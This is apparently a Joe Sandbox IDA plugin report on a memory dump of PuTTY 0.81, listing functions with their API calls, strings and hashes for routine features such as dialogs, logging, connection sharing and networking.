Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc
String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
API String ID: 190572456-1260934078
Opcode ID: 42b0469c7202c234b9b1263aff72b761f273ff432dff39b644b0f5231bd9bf5d
Instruction ID: 242f792b40f3a3fd60d2d496a9ed1aa0f4704683b9c0601967ecda85a178de2b
Opcode Fuzzy Hash: 42b0469c7202c234b9b1263aff72b761f273ff432dff39b644b0f5231bd9bf5d
Instruction Fuzzy Hash: C531FC71600B47AADB51DF75AC58B2D7EE8BB0274CF14826AA801D73B5FBB8C440CB14

Function 00BC4C60 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(00000003), ref: 00BC4CFF
GetSysColor.USER32(00000018), ref: 00BC4D13
GetSysColor.USER32(00000017), ref: 00BC4D1C
SystemParametersInfoA.USER32(00000029,00000158,00000158,00000000), ref: 00BC4D4D
CreateFontIndirectA.GDI32(?), ref: 00BC4D5B
SetWindowTextA.USER32(00000000,?), ref: 00BC4D85
CreateCompatibleDC.GDI32(00000000), ref: 00BC4D99
_strlen.LIBCMT ref: 00BC4DA2
GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BC4DB2
DeleteDC.GDI32(00000000), ref: 00BC4DB9
GetWindowRect.USER32(?), ref: 00BC4DC3
CreateWindowExA.USER32(00000088,00000010,?,80000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00BC4E0D
ShowWindow.USER32(00000000,00000004), ref: 00BC4E1B

Strings

%dx%d, xrefs: 00BC4D6C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem_strlen
String ID: %dx%d
API String ID: 816365731-2206825331
Opcode ID: dbc4ab476ccd5955d022beb5af36e3b5cf11bf224d037c2b0933c33af97de77f
Instruction ID: 42d9f8b5b3735fe4953eda5f15d8038d1fc6e26a8bedf7d5ca0f54f45ffba39c
Opcode Fuzzy Hash: dbc4ab476ccd5955d022beb5af36e3b5cf11bf224d037c2b0933c33af97de77f
Instruction Fuzzy Hash: A8418EB0504300AFE7149F64EC59BAF7BE8EBC570AF00482DF545972A0DBB09A45CBA2

Function 00BBDAE0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00BBDB25
SetDlgItemTextA.USER32(?,000003EA,00000000), ref: 00BBDB6E

Part of subcall function 00BDFDD0: GetDlgItem.USER32(00000000,00000000), ref: 00BDFDDC
Part of subcall function 00BDFDD0: GetWindowLongA.USER32(00000000,000000F0), ref: 00BDFDED
Part of subcall function 00BDFDD0: GetWindowLongA.USER32(00000000,000000EC), ref: 00BDFDF4
Part of subcall function 00BDFDD0: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00BDFE0E
Part of subcall function 00BDFDD0: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00BDFE14
Part of subcall function 00BDFDD0: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00BDFE23

ShellExecuteA.SHELL32(?,open,https://www.chiark.greenend.org.uk/~sgtatham/putty/,00000000,00000000,0000000A), ref: 00BBDBC1
EndDialog.USER32(?,00000001), ref: 00BBDBCC
EnableWindow.USER32(?,00000000), ref: 00BBDBE4
DialogBoxParamA.USER32(00000071,?,00BBF780,00000000), ref: 00BBDBF6
EnableWindow.USER32(?,00000001), ref: 00BBDBFF
SetActiveWindow.USER32(?), ref: 00BBDC02

Strings

PuTTY, xrefs: 00BBDB13, 00BBDB4E
https://www.chiark.greenend.org.uk/~sgtatham/putty/, xrefs: 00BBDBB6
Release 0.81, xrefs: 00BBDB49
open, xrefs: 00BBDBBB
About %s, xrefs: 00BBDB14
%s%s%s%s, xrefs: 00BBDB4F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Long$DialogEnableItemText$ActiveExecuteParamShell
String ID: %s%s%s%s$About %s$PuTTY$Release 0.81$https://www.chiark.greenend.org.uk/~sgtatham/putty/$open
API String ID: 2657381607-2068196236
Opcode ID: 6459f0f124bd6777003df850b63ff0e855e61dcaa0b4023ea1a4bb97238b63b5
Instruction ID: ff1f65d2fbd62153ab091fb624658bbc30b8406008733145af7bddff2676e098
Opcode Fuzzy Hash: 6459f0f124bd6777003df850b63ff0e855e61dcaa0b4023ea1a4bb97238b63b5
Instruction Fuzzy Hash: 632127B1A442447BE5203B20AC8FF7F729CD711B05F150876FA02E62D2F5E99C014366

Function 00BA7330 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00BA7349
MessageBeep.USER32(00000000), ref: 00BA7360
GetTickCount.KERNEL32 ref: 00BA7366
GetTickCount.KERNEL32 ref: 00BA7376
Beep.KERNEL32(00000320,00000064), ref: 00BA739F
ShowCursor.USER32(00000001), ref: 00BA73F6
MessageBoxA.USER32(00000000,00000000,00000030), ref: 00BA7433
GetTickCount.KERNEL32 ref: 00BA7467

Strings

%s Sound Error, xrefs: 00BA741A
Unable to play sound file%sUsing default sound instead, xrefs: 00BA7405

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CountTick$BeepMessage$CursorShow
String ID: %s Sound Error$Unable to play sound file%sUsing default sound instead
API String ID: 3991535243-3498667495
Opcode ID: f6b910971d3077032d6b99ae9c218d805fd0b3142c91ec3db493d21656c04f28
Instruction ID: c310add5d35477a61339b6af4c3949dfc4a0cc7c7045fd92f736554fb1d979cc
Opcode Fuzzy Hash: f6b910971d3077032d6b99ae9c218d805fd0b3142c91ec3db493d21656c04f28
Instruction Fuzzy Hash: 9F51C43094C340EBEB209F28FC5AB1D7BE1EB47718F044469F845972B1EB718944DB56

Function 00BAAAD0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00BAAAE5
IsZoomed.USER32 ref: 00BAAB0C
GetWindowLongA.USER32(000000F0), ref: 00BAAB1E
GetWindowLongA.USER32(000000F0), ref: 00BAAB37
SetWindowLongA.USER32(000000F0,00200000), ref: 00BAAB69
GetDesktopWindow.USER32 ref: 00BAABC0
GetClientRect.USER32(00000000), ref: 00BAABCA
SetWindowPos.USER32(00000000,00000000,?,?,?,00000020), ref: 00BAABF1
CheckMenuItem.USER32(00000180,00000008), ref: 00BAAC11
CheckMenuItem.USER32(00000180,00000008), ref: 00BAAC20

Strings

(, xrefs: 00BAAB8B
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BAAAF4
IsZoomed(wgs.term_hwnd), xrefs: 00BAAAF9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopRect
String ID: ($/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$IsZoomed(wgs.term_hwnd)
API String ID: 4021424604-1955039746
Opcode ID: f50e015ecf5ee373884d7d7d2148280ca7ee224d25ddfafb1441fe10bf3788e6
Instruction ID: baf7535bf19fc6a33c3017b8d6aa58d7a27fc0fde242c81af48a60c500509925
Opcode Fuzzy Hash: f50e015ecf5ee373884d7d7d2148280ca7ee224d25ddfafb1441fe10bf3788e6
Instruction Fuzzy Hash: 9B316E70608211AFE714AF28ED2AB1EBBE5FB49754F00452DF845D32B0DB709C11CB65

Function 00BC0060 Relevance: 22.7, APIs: 15, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00BC0081
_strlen.LIBCMT ref: 00BC008A
_strlen.LIBCMT ref: 00BC00A7
SetMapMode.GDI32(00000000,00000001), ref: 00BC00C5
MapDialogRect.USER32(?,00000000), ref: 00BC00F2
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BC0103
SelectObject.GDI32(00000000,00000000), ref: 00BC010B
_strlen.LIBCMT ref: 00BC011F
GetTextExtentExPointA.GDI32(00000000,?,00000000,?,?,?,?), ref: 00BC013E
_strlen.LIBCMT ref: 00BC0169
_strncpy.LIBCMT ref: 00BC01B2
SelectObject.GDI32(00000000,00000000), ref: 00BC0279
ReleaseDC.USER32(?,00000000), ref: 00BC0282

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen$ObjectSelect$DialogExtentMessageModePointRectReleaseSendText_strncpy
String ID:
API String ID: 1808708362-0
Opcode ID: f7d41fd3f16e946492c690a675e752451f17fffac7b3fcd0ede3e0fa943ae88f
Instruction ID: 772f30d70f48ba763e12b533032886c4f6a9d1b57b47b5c467eab12d93903877
Opcode Fuzzy Hash: f7d41fd3f16e946492c690a675e752451f17fffac7b3fcd0ede3e0fa943ae88f
Instruction Fuzzy Hash: CA616AB5508300AFD310AF54DC89B2FBBE8EF88754F14482DF98997242E775E909DB62

Function 00C095F0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 189synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00C304A0: _strlen.LIBCMT ref: 00C304B6

GetLastError.KERNEL32 ref: 00C0978B

Part of subcall function 00C08350: GetUserNameA.ADVAPI32(00000000), ref: 00C08414
Part of subcall function 00C08350: GetUserNameA.ADVAPI32(00000000), ref: 00C08440

Part of subcall function 00C30600: CreateMutexA.KERNEL32(?,00000000,?), ref: 00C3066F
Part of subcall function 00C30600: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00C3067E
Part of subcall function 00C30600: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C0963B,00000000,?), ref: 00C306B1
Part of subcall function 00C30600: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C0963B,00000000,?), ref: 00C306C0

ReleaseMutex.KERNEL32(00000000), ref: 00C0977C
CloseHandle.KERNEL32(00000000), ref: 00C09783
ReleaseMutex.KERNEL32(00000000), ref: 00C0981D
CloseHandle.KERNEL32(00000000), ref: 00C09824

Part of subcall function 00C08350: GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00C0839E
Part of subcall function 00C08350: ___from_strstr_to_strchr.LIBCMT ref: 00C083EE

Strings

Local\putty-connshare-mutex, xrefs: 00C09617
\\.\pipe\putty-connshare, xrefs: 00C09651
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/sharing.c, xrefs: 00C09757
%s.%s.%s, xrefs: 00C0961C, 00C09656
%s: %s, xrefs: 00C096BA, 00C0971C
*logtext || *ds_err || *us_err, xrefs: 00C0975C
Unable to call CryptProtectMemory: %s, xrefs: 00C0979B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait___from_strstr_to_strchr_strlen
String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
API String ID: 2618670743-959505643
Opcode ID: 374c9e043fa81d5f96c2ff348e93d71654d4effc79f617288b6d049fb8619d0c
Instruction ID: ee010ccf035c4d50da9a52ffcbc2c50437b1035312491888ebe4c76558e09d9f
Opcode Fuzzy Hash: 374c9e043fa81d5f96c2ff348e93d71654d4effc79f617288b6d049fb8619d0c
Instruction Fuzzy Hash: 355194B6904244AFD7006F65AC4AA2B76E8EF46748F040479F90A9B393F632DA14D753

Function 00BC52E0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00BE9BE0: GetLocalTime.KERNEL32(?,?,?,?,00BC50A4,?), ref: 00BE9BF6

_strftime.LIBCMT ref: 00BC5368

Part of subcall function 00BC5AF0: _strlen.LIBCMT ref: 00BC5B1D

Strings

Error writing, xrefs: 00BC53D8
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c, xrefs: 00BC543D
ctx->state != L_OPENING, xrefs: 00BC5442
unknown, xrefs: 00BC53C9, 00BC53F8
%s session log (%s mode) to file: %s, xrefs: 00BC53FA
Writing new, xrefs: 00BC53E8, 00BC53F9
%Y.%m.%d %H:%M:%S, xrefs: 00BC535E
=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=, xrefs: 00BC5371
Appending, xrefs: 00BC53E3
Disabled writing, xrefs: 00BC53D3
SSH raw data, xrefs: 00BC53C4

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: LocalTime_strftime_strlen
String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
API String ID: 4241967358-759394250
Opcode ID: 52cf37c1e0af0159460378f5d2c3d924f138f62a74fc03d83606664ee289a36c
Instruction ID: 610f98dbad7f13cae6a46f4c79601a02372660d3826485dbc34d8de372699c21
Opcode Fuzzy Hash: 52cf37c1e0af0159460378f5d2c3d924f138f62a74fc03d83606664ee289a36c
Instruction Fuzzy Hash: 3141B6B5A007449BDB34AB20DC86F6B76E5EB85709F04447CE88A47342F771A994C752

Function 00BC49C4 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 204comCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BC49DC
_strrchr.LIBCMT ref: 00BC49EF
CoCreateInstance.OLE32(00C707D4,00000000,00000001,00C707C4,?), ref: 00BC4A96
_strcspn.LIBCMT ref: 00BC4B36
_strcspn.LIBCMT ref: 00BC4BE5

Strings

appname, xrefs: 00BC4B23, 00BC4BD2
j\h, xrefs: 00BC49D5
Connect to PuTTY session ', xrefs: 00BC4B03
%.*s%s, xrefs: 00BC4A08
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c, xrefs: 00BC4B1E, 00BC4BCD
Run %.*s, xrefs: 00BC4B40, 00BC4BEF

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strcspn_strrchr$CreateInstance
String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/jump-list.c$Connect to PuTTY session '$Run %.*s$appname$j\h
API String ID: 3753966584-3715554481
Opcode ID: 6b273b62714c6e94b9bb9e03ffda1d9a7020f51980ff3782b1450cc688868992
Instruction ID: 481d0812b150b46c44b09569088edeced581f7a8d6626a61cb79137d61cd1bf1
Opcode Fuzzy Hash: 6b273b62714c6e94b9bb9e03ffda1d9a7020f51980ff3782b1450cc688868992
Instruction Fuzzy Hash: D351B8F5A44300AFDA00EF60AC9AF1B76E89F95709F04447DF84597282FB71E905C7A6

Function 00BD4B80 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 195libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDC110: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00BDC182
Part of subcall function 00BDC110: RegCloseKey.ADVAPI32(?), ref: 00BDC1BA

GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00BD4C2B

Part of subcall function 00BD5220: CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BD4D9B), ref: 00BD525B

GetEnvironmentVariableA.KERNEL32(HOMEDRIVE,?,00000104), ref: 00BD4CF5
GetEnvironmentVariableA.KERNEL32(HOMEPATH,?,00000104), ref: 00BD4D08
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BD4D70

Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BD4BC3,00000000,RandSeedFile), ref: 00BDC367
Part of subcall function 00BDC340: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BDC39F

Part of subcall function 00BDC1E0: RegCloseKey.ADVAPI32(00000000,00BD4BCE,00000000), ref: 00BDC1E4

Strings

SHGetFolderPathA, xrefs: 00BD4C25
HOMEPATH, xrefs: 00BD4D03
HOMEDRIVE, xrefs: 00BD4CF0
shell32.dll, xrefs: 00BD4C0F
RandSeedFile, xrefs: 00BD4BB8
Software\SimonTatham\PuTTY, xrefs: 00BD4B9C
\PUTTY.RND, xrefs: 00BD4C64, 00BD4CAB, 00BD4D2B, 00BD4D7F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CloseCreateEnvironmentQueryValueVariable$AddressDirectoryFileProcWindows
String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
API String ID: 1153880102-1528239033
Opcode ID: 3a20d8888cdb9ba46774f9396fcfac71ae77e6ed3c413409cad438eb52fea02e
Instruction ID: dad598e91a4ff2596e4b23531a749e12bdb5dc2b29e6c0e7dc7e9ef46750d336
Opcode Fuzzy Hash: 3a20d8888cdb9ba46774f9396fcfac71ae77e6ed3c413409cad438eb52fea02e
Instruction Fuzzy Hash: 3551F9B5B4434427E62472347C87FAAB5D9CBA5B48F0800B6F949973C2FBB1DD058266

Function 00C13F80 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 315COMMON

Download Yara Rule

Strings

host, xrefs: 00C14095
proxyport, xrefs: 00C1410D
pass, xrefs: 00C140DD
user, xrefs: 00C140C5
proxyhost, xrefs: 00C140F5
port, xrefs: 00C140AD

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: host$pass$port$proxyhost$proxyport$user
API String ID: 0-3129514663
Opcode ID: 1a7e6034bd89ea45b91a67c4d4a0330e8a18f0f6c7547691c90ae24135184661
Instruction ID: efff6b6ad165f745f4fe39cd9c1a11abdb4aa43feb0b5ad4a1c83487856ffab9
Opcode Fuzzy Hash: 1a7e6034bd89ea45b91a67c4d4a0330e8a18f0f6c7547691c90ae24135184661
Instruction Fuzzy Hash: 4EA1BCB1944300BBD3346720EC42BFBBBE1CF92745F444439FD98962A2F3319A85B682

Function 00BD5F20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 205networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 00BD5FFC
htonl.WS2_32(00000000), ref: 00BD6005
socket.WS2_32(00000002,00000002,00000000), ref: 00BD6029
SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,00000000,00BEEA7D,00000000), ref: 00BD6036
htonl.WS2_32(?), ref: 00BD60C4
socket.WS2_32(00000002,00000002,00000000), ref: 00BD60EC
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00BD60F9

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00BD5FAA, 00BD5FE5
family == AF_UNSPEC, xrefs: 00BD5FAF
addr->addresses && step.curraddr < addr->naddresses, xrefs: 00BD5FEA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: htonl$HandleInformationsocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
API String ID: 626431343-251196645
Opcode ID: 769ba99ed0e6ee8e626944cdba893ca8e10c9a03e4abc04bdc0ba7aa23954469
Instruction ID: 0a070916ff0701546f956550f9e56c599865234d74acd5a78931287f46e4b3aa
Opcode Fuzzy Hash: 769ba99ed0e6ee8e626944cdba893ca8e10c9a03e4abc04bdc0ba7aa23954469
Instruction Fuzzy Hash: BF51E531A417019BEB389B24CC4AF2AF7E5EBA1724F15415AF9599F3D1E3B0DC40C285

Function 00BAB400 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159fileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000106,?), ref: 00BAB452
GetCurrentProcessId.KERNEL32 ref: 00BAB460
CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00BAB490
GetLastError.KERNEL32 ref: 00BAB4B0
CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00BAB4FB
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BAB532
DeleteFileA.KERNEL32(00000000,?,?,?,00000000), ref: 00BAB541
CloseHandle.KERNEL32(00000000), ref: 00BAB5E6

Strings

%s::/%s.html>main, xrefs: 00BAB572
%s\putty_%lu_%llu.chm, xrefs: 00BAB46E, 00BAB4D9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
